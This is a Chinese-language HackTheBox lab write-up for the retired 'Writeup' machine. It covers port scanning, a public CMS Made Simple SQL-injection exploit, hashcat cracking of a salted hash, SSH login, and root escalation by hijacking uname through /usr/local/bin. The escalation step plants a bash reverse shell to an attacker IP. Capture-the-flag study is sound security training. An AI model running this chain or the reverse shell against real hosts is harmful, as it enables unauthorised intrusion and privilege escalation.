• HTB-靶机-Writeup


    本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

    靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.138

    本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

    执行命令 autorecon 10.10.10.138 -o ./Writeup-autorecon

    快速扫描
    ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.138 | grep ^[0-9] | cut -d '/' -f 1 | tr '
    ' ',' | sed s/,$//)
    nmap -sC -sV -p$ports 10.10.10.138

    就开了2个端口,扫描结果发现了writeup,访问得到如下

    查看网页源代码发现使用的cms程序名称

    根据其显示Copyright 2004-2019的结果猜测有可能是最近的漏洞版本有关

    经过测试确认存在SQL注入漏洞可以利用https://www.exploit-db.com/exploits/46635

    python 46635.py -u http://10.10.10.138/writeup

    得到了账号和加了salt的密码hash,我们使用hashcat进行密码破解

    echo '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807' > bmfxhash
    hashcat -a 0 -m 20 bmfxhash /usr/share/wordlists/rockyou.txt

    得到账号和密码之后直接就ssh登录

    执行id命令,发现当前用户存在于很多组,其中存在于组staff,通过下载pspy程序到目标靶机上执行进程活动,同时再次ssh登录目标靶机发现

    发现了登录用户jkr的时候回执行/etc/update-motd.d文件夹下的文件,查看下面的文件内容

    执行的文件命令是uname -rnsom 此处我们就可以通过PATH劫持的方式劫持命令uname进行提权,具体提权看如下操作

    通过PATH进行劫持uname这个命令
    cd /tmp
    printf '#!/bin/bash' > uname
    printf '
    bash -i >& /dev/tcp/10.10.14.3/8833 0>&1' >> uname
    chmod a+x uname
    cp uname /usr/local/bin/

    上面最后一步劫持复制到目录/usr/local/bin/的原因是该路径下属于组staff,具体可以查看这里:https://wiki.debian.org/SystemGroups 大概意思就是是该组的用户可以不需要root权限就可以更改$PATH信息从而达到劫持的效果

    上述执行完成操作之后记得要再次ssh登录目标靶机然后本地监听反弹端口即可触发提权操作

  • 相关阅读:
    二柱子四则运算程序
    测绘软件使用感受
    二分图的最大匹配、完美匹配和匈牙利算法(转载)
    serialVersionUID的用处(转载)
    RMQ(模板)
    codeforces 825E
    红黑树
    SQL 范式(转载)
    java 移位运算
    [Hnoi2010]Bounce 弹飞绵羊
  • 原文地址:https://www.cnblogs.com/autopwn/p/14262562.html
Copyright © 2020-2023  润新知